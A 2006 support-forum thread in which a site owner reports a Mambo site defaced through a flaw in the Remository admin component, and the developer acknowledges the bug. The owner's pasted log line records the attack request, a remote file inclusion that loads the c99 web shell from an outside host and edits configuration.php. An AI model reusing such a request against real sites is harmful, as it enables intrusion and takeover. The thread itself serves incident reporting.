Mambo hacked via remository - Remository Forum

Home

Forum

Remository Forum

home | post reply | threaded view | help | rules

Boardwalk :: Forum List

Remository

Support Remository older versions

dogsbody

Karma: 0

Mambo hacked via remository - 2006/08/11 10:24 Hi,

Today my mambo site was hacked and all pages replaced with THIS.

The hack was pretty simple, mambo's configuration.php file was overwritten which instantly replaced all the site pages with this one.

Looking at my log files it looks like they got in via the remository admin interface!...

88.240.237.27 - - [11/Aug/2006:09:42:42 +0100] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F% 2Fdeadbone.by.ru%2Fc99.txt%3Fcmd&act=f&f=configuration.php&ft=edit&d=%2Fhome%2Fsites%2Fsite3%2Fweb HTTP/1.1" 200 3703 "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F% 2Fdeadbone.by.ru%2Fc99.txt%3Fcmd&act=f&f=configuration.php&ft=edit&d=%2Fhome%2Fsites%2Fsite3%2Fweb" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

| | Sorry, you do not currently have permission to write here.

admin Karma: 98	Re:Mambo hacked via remository - 2006/08/11 19:01 Sorry, I overlooked an error in admin.remository.php - please see this post in the forum or look at http://forum.mamboguru.com/showthread.php?t=433. Post edited by: admin, at: 2006/08/11 14:02 Martin Brampton aka Counterpoint http://aliro.org http://black-sheep-research.com
	\| \| Sorry, you do not currently have permission to write here.

121books.org Karma: 0	Re:Mambo hacked via remository - 2006/08/12 14:58 Post edited by: 121books.org, at: 2007/03/31 00:31
	\| \| Sorry, you do not currently have permission to write here.

admin Karma: 98	Re:Mambo hacked via remository - 2006/08/13 14:53 There is a mass mail component, but if I remember rightly, that had a security vulnerability Martin Brampton aka Counterpoint http://aliro.org http://black-sheep-research.com
	\| \| Sorry, you do not currently have permission to write here.

Boardwalk :: Forum List Remository Support Remository older versions

Aliroboard Forum Component 1.2
Aliro Software

Advice Notes

Login

Subscribe to Premium Support

Get priority support for Remository and Glossary, sign up now for a Premium Support monthly subscription:

Or purchase a year's support:

Recommended SEF

Who is Online

Remository welcomes guests and visitors

remository